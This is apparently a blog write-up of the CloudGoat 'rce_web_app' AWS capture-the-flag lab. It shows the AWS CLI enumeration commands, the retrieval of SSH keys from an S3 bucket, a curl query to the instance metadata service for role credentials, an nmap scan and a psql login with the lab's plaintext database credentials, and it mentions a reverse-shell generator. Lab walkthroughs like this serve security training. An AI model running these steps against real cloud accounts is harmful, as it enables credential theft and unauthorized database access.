Cloudgoat AWS CTF solution- Scenerio 8 (rce_web_app)

n00🔑
6 min readOct 23, 2022

--

Scenerio 8 — rce_web_app

Deployment:

git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
chmod +x cloudgoat.py
./cloudgoat.py config whitelist --auto
./cloudgoat.py create rce_web_app

Scenario Resources

1 VPC with:

  • ELB x 1
  • EC2 x 1
  • S3 x 3
  • RDS x 1

2 IAM Users

Scenario Start(s)

  1. IAM User “Lara”
  2. IAM User “McDuck”

Scenario Goal(s)

Find a secret stored in the RDS database.

Summary

Starting as the IAM user Lara, the attacker explores a Load Balancer and S3 bucket for clues to vulnerabilities, leading to an RCE exploit on a vulnerable web app which exposes confidential files and culminates in access to the scenario’s goal: a highly-secured RDS database instance.

Alternatively, the attacker may start as the IAM user McDuck and enumerate S3 buckets, eventually leading to SSH keys that grant direct access to the EC2 server and the database beyond.

Exploitation Route(s)

Route Walkthrough — IAM User “Lara”

  1. We have been provided with access to the account of “mcduck” user. We start by enumerating its permissions-

2. Listing files in bucket “cg-logs-s3-bucket-rce-web-app-cgid0kyrstov20

aws --profile lara --region us-east-1 s3 ls
aws --profile lara --region us-east-1 s3 ls --recursive s3://cg-logs-s3-bucket-rce-web-app-cgid0kyrstov20

Downloading the log file “555555555555_elasticloadbalancing_us-east-1_app.cg-lb-cgidp347lhz47g.d36d4f13b73c2fe7_20190618T2140Z_10.10.10.100_5m9btchz.log

Found endpoint “mkja1xijqf0abo1h9glg.html

3. The logs which we got are from ELB. Let us try to see available load balancers-

aws --region us-east-1 elbv2 describe-load-balancers --profile lara

Opening the dnsname-

http://cg-lb-rce-web-app-cgid0kyrstov20-1666991724.us-east-1.elb.amazonaws.com/

4. Apendding the endpoint found in logs to the URL http://cg-lb-rce-web-app-cgid0kyrstov20-1666991724.us-east-1.elb.amazonaws.com/mkja1xijqf0abo1h9glg.html-

5. Getting reverse shell-

a. It has functionality allowing us to run OS commands-

b. Generating python3 rev shell-

We have used this tool which generates a base64 encoded python3 rev shell.

python3 b64_rev_shell_one_liner.py <your_ip> <your_listening_port>

c. Getting reverse shell-

Branch A

6. Rest steps(6–8) are the same from below Route Walkthrough — IAM User “McDuck”

Branch B

  1. Found db connection info and creds in metadata api-
psql postgresql://cgadmin:Purplepwny2029@cg-rds-instance-rce-web-app-cgid0kyrstov20.czksqkjfewb6.us-east-1.rds.amazonaws.com:5432/cloudgoat

Route Walkthrough — IAM User “McDuck”

  1. We have been provided with access to the account of “mcduck” user. We start by enumerating its permissions-

2. The attacker explores the AWS environment and discovers they are able to list S3 buckets using their starting keys-

aws --region us-east-1 --profile mcduck s3 lscg-keystore-s3-bucket-rce-web-app-cgidckqt6c2yi0
cg-logs-s3-bucket-rce-web-app-cgidckqt6c2yi0
cg-secret-s3-bucket-rce-web-app-cgidckqt6c2yi0

3. Enumerating s3 buckets-

a. cg-keystore-s3-bucket-rce-web-app-cgidckqt6c2yi0

#Listing files
aws --region us-east-1 --profile mcduck s3 ls s3://cg-keystore-s3-bucket-rce-web-app-cgidckqt6c2yi0
#Downloading files
aws --region us-east-1 --profile mcduck s3 cp s3://cg-keystore-s3-bucket-rce-web-app-cgidckqt6c2yi0/cloudgoat s3/cg-keystore-s3-bucket-rce-web-app-cgidckqt6c2yi0/cloudgoat
aws --region us-east-1 --profile mcduck s3 cp s3://cg-keystore-s3-bucket-rce-web-app-cgidckqt6c2yi0/cloudgoat.pub s3/cg-keystore-s3-bucket-rce-web-app-cgidckqt6c2yi0/cloudgoat.pub

b. cg-logs-s3-bucket-rce-web-app-cgidckqt6c2yi0

aws --region us-east-1 --profile mcduck s3 ls s3://cg-logs-s3-bucket-rce-web-app-cgidckqt6c2yi0

c. cg-secret-s3-bucket-rce-web-app-cgidckqt6c2yi0

aws --region us-east-1 --profile mcduck s3 ls s3://cg-secret-s3-bucket-rce-web-app-cgidckqt6c2yi0

4. We discovered that the SSH keys found in the S3 bucket enabled us to log into the EC2 instance.

a. Determining running ec2 instances and their public IPs-

public ip:54.221.179.80
aws --region us-east-1 --profile mcduck ec2 describe-instances

b. Logging into ec2 instance-

5. Now working through the EC2 instance (and therefore operating with its role instead of McDuck’s), we are able to discover and access a private S3 bucket.

a. Getting creds and logging in with the role cg-ec2-role-rce_web_app_cgidckqt6c2yi0-

curl 169.254.169.254/latest/meta-data/iam/security-credentials/cg-ec2-role-rce_web_app_cgidckqt6c2yi0
aws --region us-east-1 --profile ec2_role sts get-caller-identity

6. Enumerating permissions of this ec2’s role-

7. Again trying to read s3 buckets cg-logs-s3-bucket-rce-web-app-cgidckqt6c2yi0 and cg-secret-s3-bucket-rce-web-app-cgidckqt6c2yi0

aws --region us-east-1 --profile ec2_role s3 ls s3://cg-secret-s3-bucket-rce-web-app-cgidckqt6c2yi0

Downloading and db.txt with ec2_role(cg-ec2-role-rce_web_app_cgidckqt6c2yi0)

aws --region us-east-1 --profile ec2_role s3 cp s3://cg-secret-s3-bucket-rce-web-app-cgidckqt6c2yi0/db.txt ./s3/cg-secret-s3-bucket-rce-web-app-cgidckqt6c2yi0/db.txt
DB name: cloudgoat
Username: cgadmin
Password: Purplepwny2029

8. Finding and accessing the database using these creds-

a. Finding database-

aws --region us-east-1 --profile ec2_role rds describe-db-instances

cg-rds-instance-rce-web-app-cgidckqt6c2yi0.czksqkjfewb6.us-east-1.rds.amazonaws.com:5432

b. Database is accessible only via ec2 instance-

nmap -Pn --disable-arp-ping -n -vv -sS -p5432 cg-rds-instance-rce-web-app-cgidckqt6c2yi0.czksqkjfewb6.us-east-1.rds.amazonaws.com -sV --version-all

c. Finding secret in DB-

psql -h cg-rds-instance-rce-web-app-cgidckqt6c2yi0.czksqkjfewb6.us-east-1.rds.amazonaws.com -U cgadmin -d cloudgoat

V!C70RY-4hy2809gnbv40h8g4b

References-

https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/rce_web_app/README.md

--

--

n00🔑

Computer Security Enthusiast.Definitely not an expert. Usually plays HTB (ID-23862). https://www.youtube.com/@pswalia2u https://www.linkedin.com/in/pswalia2u/